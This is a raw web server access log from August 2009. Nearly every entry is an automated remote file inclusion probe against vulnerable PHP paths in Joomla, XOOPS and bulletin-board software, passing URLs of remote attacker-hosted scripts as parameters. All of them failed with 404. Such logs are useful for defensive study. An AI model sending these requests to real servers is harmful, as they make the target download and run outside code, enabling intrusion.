117.110.74.195 - - [15/Aug/2009:23:09:26 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.cascadecollision.com////fx29id1.txt???? HTTP/1.1" 404 291 "-""Mozilla/5.0"
117.110.74.195 - - [15/Aug/2009:23:09:27 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.cascadecollision.com////fx29id1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
218.38.136.251 - - [15/Aug/2009:23:09:37 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.98.115.58 - - [15/Aug/2009:23:09:58 -0500] "GET /logs/access_log.1245801600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://jenniferlthomas.com/baner.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
65.98.115.58 - - [15/Aug/2009:23:09:58 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://jenniferlthomas.com/baner.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.98.115.58 - - [15/Aug/2009:23:09:58 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://jenniferlthomas.com/baner.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.98.115.58 - - [15/Aug/2009:23:09:59 -0500] "GET /logs/access_log.1242691200//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://jenniferlthomas.com/baner.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
79.171.18.196 - - [15/Aug/2009:23:12:44 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
79.171.18.196 - - [15/Aug/2009:23:12:45 -0500] "GET /logs/access_log.1245801600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
79.171.18.196 - - [15/Aug/2009:23:12:45 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.55.106.114 - - [15/Aug/2009:23:12:47 -0500] "GET /logs/access_log.1133827200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.171.18.196 - - [15/Aug/2009:23:12:48 -0500] "GET /logs/access_log.1242691200//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
124.158.127.241 - - [15/Aug/2009:23:15:18 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
124.158.127.241 - - [15/Aug/2009:23:15:18 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
124.158.127.241 - - [15/Aug/2009:23:15:18 -0500] "GET /logs/access_log.1247788800//bbs//skin/ggambo7002_board/write.php?dir=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
124.158.127.241 - - [15/Aug/2009:23:15:21 -0500] "GET /logs/access_log.1247788800//bbs//skin/ggambo7002_board/write.php?dir=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 347 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
124.158.127.241 - - [15/Aug/2009:23:15:21 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 320 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
124.158.127.241 - - [15/Aug/2009:23:15:21 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 325 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
198.145.43.142 - - [15/Aug/2009:23:16:11 -0500] "GET /logs/access_log.1236038400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.better-battles.com/includes/conf/idxx.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
198.145.43.142 - - [15/Aug/2009:23:16:11 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.better-battles.com/includes/conf/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
198.145.43.142 - - [15/Aug/2009:23:16:11 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.better-battles.com/includes/conf/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
222.234.2.107 - - [15/Aug/2009:23:16:11 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.234.2.107 - - [15/Aug/2009:23:16:11 -0500] "GET /logs/access_log.1236211200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.234.2.107 - - [15/Aug/2009:23:16:11 -0500] "GET /logs/access_log.1237075200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.234.2.107 - - [15/Aug/2009:23:16:12 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
124.158.127.241 - - [15/Aug/2009:23:16:44 -0500] "GET /logs/access_log.1248134400//bbs//skin/ggambo7002_board/write.php?dir=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
86.39.131.85 - - [15/Aug/2009:23:17:31 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
86.39.131.85 - - [15/Aug/2009:23:17:31 -0500] "GET /logs/access_log.1246665600/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
86.39.131.85 - - [15/Aug/2009:23:17:31 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
91.194.250.221 - - [15/Aug/2009:23:18:49 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.194.250.221 - - [15/Aug/2009:23:18:49 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.194.250.221 - - [15/Aug/2009:23:18:49 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.222.30.58 - - [15/Aug/2009:23:19:29 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.222.30.58 - - [15/Aug/2009:23:19:30 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.222.30.58 - - [15/Aug/2009:23:19:30 -0500] "GET /logs/access_log.1236211200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.222.30.58 - - [15/Aug/2009:23:19:32 -0500] "GET /logs/access_log.1237075200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.194.250.221 - - [15/Aug/2009:23:19:40 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
198.145.43.142 - - [15/Aug/2009:23:20:21 -0500] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.better-battles.com/includes/conf/idxx.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:23:21:40 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:23:21:40 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:23:21:40 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
115.88.240.91 - - [15/Aug/2009:23:22:09 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
115.88.240.91 - - [15/Aug/2009:23:22:09 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
115.88.240.91 - - [15/Aug/2009:23:22:09 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:23:22:25 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:23:22:25 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:23:22:25 -0500] "GET /logs/access_log.1236038400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:22:36 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:22:36 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:22:36 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:22:50 -0500] "GET /logs/access_log.1247270400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:23:07 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:23:07 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:23:08 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
115.88.240.91 - - [15/Aug/2009:23:23:14 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
115.88.240.91 - - [15/Aug/2009:23:23:14 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
115.88.240.91 - - [15/Aug/2009:23:23:14 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:23:21 -0500] "GET /logs/access_log.1247270400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
115.88.240.91 - - [15/Aug/2009:23:24:04 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.15 - - [15/Aug/2009:23:25:20 -0500] "GET //setup.php?dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.221.130.15 - - [15/Aug/2009:23:25:20 -0500] "GET /logs/access_log.1240012800//setup.php?dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.221.130.15 - - [15/Aug/2009:23:25:20 -0500] "GET /logs//setup.php?dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.221.130.15 - - [15/Aug/2009:23:25:20 -0500] "GET /logs/access_log.1239926400//setup.php?dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
119.63.193.56 - - [15/Aug/2009:23:25:35 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
115.88.240.91 - - [15/Aug/2009:23:26:02 -0500] "GET /logs/access_log.1236038400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
77.221.130.15 - - [15/Aug/2009:23:26:02 -0500] "GET /logs/access_log.1239926400//setup.php?dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
77.221.130.15 - - [15/Aug/2009:23:26:08 -0500] "GET /logs//setup.php?dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
77.221.130.15 - - [15/Aug/2009:23:26:08 -0500] "GET //setup.php?dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
77.221.130.15 - - [15/Aug/2009:23:26:08 -0500] "GET /logs/access_log.1240012800//setup.php?dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
110.45.144.23 - - [15/Aug/2009:23:26:28 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
110.45.144.23 - - [15/Aug/2009:23:26:28 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
110.45.144.23 - - [15/Aug/2009:23:26:28 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
110.45.144.23 - - [15/Aug/2009:23:26:39 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
110.45.144.23 - - [15/Aug/2009:23:26:39 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
110.45.144.23 - - [15/Aug/2009:23:26:39 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
110.45.144.23 - - [15/Aug/2009:23:27:12 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [15/Aug/2009:23:27:39 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.38.136.251 - - [15/Aug/2009:23:27:39 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.38.136.251 - - [15/Aug/2009:23:27:39 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.38.136.251 - - [15/Aug/2009:23:29:25 -0500] "GET /logs/access_log.1236038400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:30:02 -0500] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:30:02 -0500] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:30:02 -0500] "GET /logs/access_log.1240790400/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:30:15 -0500] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:30:15 -0500] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:30:15 -0500] "GET /logs/access_log.1240790400/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:30:34 -0500] "GET /logs/access_log.1240963200/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:23:30:52 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/error.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:33:31 -0500] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:33:31 -0500] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:33:31 -0500] "GET /logs/access_log.1241049600/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
115.88.240.91 - - [15/Aug/2009:23:34:29 -0500] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:34:48 -0500] "GET /logs/access_log.1241049600/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
165.95.1.130 - - [15/Aug/2009:23:35:47 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
165.95.1.130 - - [15/Aug/2009:23:35:47 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
165.95.1.130 - - [15/Aug/2009:23:35:47 -0500] "GET /logs/access_log.1236211200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
165.95.1.130 - - [15/Aug/2009:23:35:47 -0500] "GET /logs/access_log.1237075200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
110.45.144.23 - - [15/Aug/2009:23:37:22 -0500] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
110.45.144.23 - - [15/Aug/2009:23:37:26 -0500] "GET /logs/access_log.1236038400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:37:30 -0500] "GET /logs/access_log.1240790400/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
193.200.255.18 - - [15/Aug/2009:23:37:44 -0500] "GET /logs/access_log.1240963200/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.38.136.251 - - [15/Aug/2009:23:41:46 -0500] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
77.240.118.133 - - [15/Aug/2009:23:42:11 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://sjzip.com/nalog507/readme/idn1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.240.118.133 - - [15/Aug/2009:23:42:11 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://sjzip.com/nalog507/readme/idn1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.240.118.133 - - [15/Aug/2009:23:42:11 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://sjzip.com/nalog507/readme/idn1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
117.110.74.195 - - [15/Aug/2009:23:45:58 -0500] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://www.cascadecollision.com////fx29id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
117.110.74.195 - - [15/Aug/2009:23:45:59 -0500] "GET /logs/access_log.1241049600%20%20//components/com_sef/sef.php?mosConfig_absolute_path=http://www.cascadecollision.com////fx29id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.110.74.195 - - [15/Aug/2009:23:45:59 -0500] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.cascadecollision.com////fx29id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:23:47:08 -0500] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
115.88.240.91 - - [15/Aug/2009:23:47:11 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
115.88.240.91 - - [15/Aug/2009:23:47:15 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
115.88.240.91 - - [15/Aug/2009:23:47:16 -0500] "GET /logs/access_log.1241049600%20%20//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.214.86.61 - - [15/Aug/2009:23:48:47 -0500] "GET /logs/access_log.1230336000//admin.color.php?mosConfig_live_site=http://samujlo.com/js/fxid.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.214.86.61 - - [15/Aug/2009:23:48:47 -0500] "GET /logs//admin.color.php?mosConfig_live_site=http://samujlo.com/js/fxid.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
85.214.86.61 - - [15/Aug/2009:23:48:47 -0500] "GET //admin.color.php?mosConfig_live_site=http://samujlo.com/js/fxid.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
